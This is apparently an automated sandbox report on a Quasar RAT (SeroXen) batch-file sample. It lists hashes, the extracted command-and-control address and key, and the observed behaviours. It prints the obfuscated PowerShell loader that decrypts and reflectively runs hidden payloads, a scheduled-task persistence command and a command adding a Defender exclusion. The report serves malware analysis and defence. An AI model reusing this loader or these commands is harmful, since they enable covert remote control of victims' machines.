Analysis
-
max time kernel
133s -
max time network
136s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
28-04-2024 16:13
General
-
Target
rename me.bat
-
Size
328KB
-
MD5
aeb5d5210a55384c6019bc889ab2712a
-
SHA1
524094d4dc90b48c110e24b26aa6cebbf15937cf
-
SHA256
3f077245d055648ee67c8597d813805f43a1a750abf17b6597ec49e6e61bba1e
-
SHA512
2e71352ad66c150a217784f0eeec50d001eef3fa60be33dd98bec3503dc0356b8e6b6df4042e1bddfb4933b25ba5c9a4202450eb6604ae00bb48a1495f54910f
-
SSDEEP
6144:v49D8DR1G9Pj1pP+irNTVDxmev+lcvhEvLpPxJMRLRsvjoOo50AqPJNIA3OiL5O9:v49DuPGtjP+irnDIev+lcv2pxLjoOoOq
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
-
encryption_key
Yr0YpBPNd3kXsl43jZMx
-
install_name
$sxr-sdinwn.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
sxr
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9cTBUxEQ3bkhNltovJO4VlBnFPtuZDAn3tKbTZM170='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q2umC619B9pCpnnAKCTQLg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FSGQo=New-Object System.IO.MemoryStream(,$param_var); $zrACb=New-Object System.IO.MemoryStream; $JlDkU=New-Object System.IO.Compression.GZipStream($FSGQo, [IO.Compression.CompressionMode]::Decompress); $JlDkU.CopyTo($zrACb); $JlDkU.Dispose(); $FSGQo.Dispose(); $zrACb.Dispose(); $zrACb.ToArray();}function execute_function($param_var,$param2_var){ $abVXg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NJXTr=$abVXg.EntryPoint; $NJXTr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$EvryY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($rkrqt in $EvryY) { if ($rkrqt.StartsWith(':: ')) { $xqxsV=$rkrqt.Substring(3); break; }}$payloads_var=[string[]]$xqxsV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /flushdns3⤵
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5ad22c362535a6830bf5798c858ea2a77
SHA1939d20c59171a7cfc1cecd62987719c74070cd08
SHA2566ad92cb2744b4e9b94223638128d06ffcbbad970c8b938ea565139c6e7d2821a
SHA512f019d54ab7a5c341cc5d3c0dd31305f56a963d293987f2fd8599d9110a1990f250095057dc4e6cb52faf7bef2e57363083cb15356f224519d9252f70ec1e094b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD593a9dd3f5fd3da2e148ea04cd291d181
SHA1e3f32726eadb9b4260924fc1c683cc12e3cddae6
SHA25641bd47a40e28db25ef627fd1e33a2ac24cf3da7841f865ca03997d8e41b08329
SHA512283eb27594792560385388a886d151b01a7a9f968da9362aae876999430a40f3a1960ce129cf56a30ce33e3b914d5be80915dda07a260f798a1a0d514ae845ad
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ywph1np.vl2.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exeFilesize
420KB
MD5be8ffebe1c4b5e18a56101a3c0604ea0
SHA12ec8af7c1538974d64291845dcb02111b907770f
SHA256d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA51271008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb
-
memory/3580-338-0x00000000091D0000-0x00000000091D8000-memory.dmpFilesize
32KB
-
memory/3580-333-0x00000000091F0000-0x000000000920A000-memory.dmpFilesize
104KB
-
memory/3580-136-0x0000000009070000-0x0000000009115000-memory.dmpFilesize
660KB
-
memory/3580-129-0x0000000008F10000-0x0000000008F2E000-memory.dmpFilesize
120KB
-
memory/3580-118-0x00000000706D0000-0x000000007071B000-memory.dmpFilesize
300KB
-
memory/3580-109-0x0000000008F30000-0x0000000008F63000-memory.dmpFilesize
204KB
-
memory/3580-102-0x0000000008D20000-0x0000000008D42000-memory.dmpFilesize
136KB
-
memory/3580-101-0x0000000008DC0000-0x0000000008E54000-memory.dmpFilesize
592KB
-
memory/4572-12-0x00000000086F0000-0x000000000873B000-memory.dmpFilesize
300KB
-
memory/4572-208-0x00000000739F0000-0x00000000740DE000-memory.dmpFilesize
6.9MB
-
memory/4572-29-0x0000000009D10000-0x000000000A388000-memory.dmpFilesize
6.5MB
-
memory/4572-30-0x0000000009270000-0x000000000928A000-memory.dmpFilesize
104KB
-
memory/4572-31-0x00000000092B0000-0x00000000092B8000-memory.dmpFilesize
32KB
-
memory/4572-32-0x00000000094F0000-0x0000000009530000-memory.dmpFilesize
256KB
-
memory/4572-33-0x0000000009710000-0x000000000977E000-memory.dmpFilesize
440KB
-
memory/4572-34-0x000000000A390000-0x000000000A88E000-memory.dmpFilesize
5.0MB
-
memory/4572-35-0x0000000009820000-0x00000000098B2000-memory.dmpFilesize
584KB
-
memory/4572-36-0x0000000007050000-0x0000000007062000-memory.dmpFilesize
72KB
-
memory/4572-37-0x0000000009780000-0x00000000097BE000-memory.dmpFilesize
248KB
-
memory/4572-13-0x0000000008500000-0x0000000008576000-memory.dmpFilesize
472KB
-
memory/4572-3-0x00000000739F0000-0x00000000740DE000-memory.dmpFilesize
6.9MB
-
memory/4572-4-0x0000000004F50000-0x0000000004F60000-memory.dmpFilesize
64KB
-
memory/4572-5-0x0000000004F50000-0x0000000004F60000-memory.dmpFilesize
64KB
-
memory/4572-6-0x00000000075E0000-0x0000000007C08000-memory.dmpFilesize
6.2MB
-
memory/4572-2-0x0000000004D00000-0x0000000004D36000-memory.dmpFilesize
216KB
-
memory/4572-11-0x0000000007D10000-0x0000000007D2C000-memory.dmpFilesize
112KB
-
memory/4572-10-0x0000000007DD0000-0x0000000008120000-memory.dmpFilesize
3.3MB
-
memory/4572-9-0x0000000007D60000-0x0000000007DC6000-memory.dmpFilesize
408KB
-
memory/4572-8-0x0000000007C10000-0x0000000007C76000-memory.dmpFilesize
408KB
-
memory/4572-7-0x0000000007440000-0x0000000007462000-memory.dmpFilesize
136KB
-
memory/4572-24-0x0000000004F50000-0x0000000004F60000-memory.dmpFilesize
64KB
-
memory/5088-82-0x00000000089E0000-0x0000000008A1C000-memory.dmpFilesize
240KB
-
memory/5088-50-0x0000000004C30000-0x0000000004C40000-memory.dmpFilesize
64KB
-
memory/5088-51-0x0000000004C30000-0x0000000004C40000-memory.dmpFilesize
64KB
-
memory/5088-49-0x00000000739F0000-0x00000000740DE000-memory.dmpFilesize
6.9MB
-
memory/5088-356-0x00000000739F0000-0x00000000740DE000-memory.dmpFilesize
6.9MB
-
memory/5088-358-0x0000000004C30000-0x0000000004C40000-memory.dmpFilesize
64KB
-
memory/5088-357-0x0000000004C30000-0x0000000004C40000-memory.dmpFilesize
64KB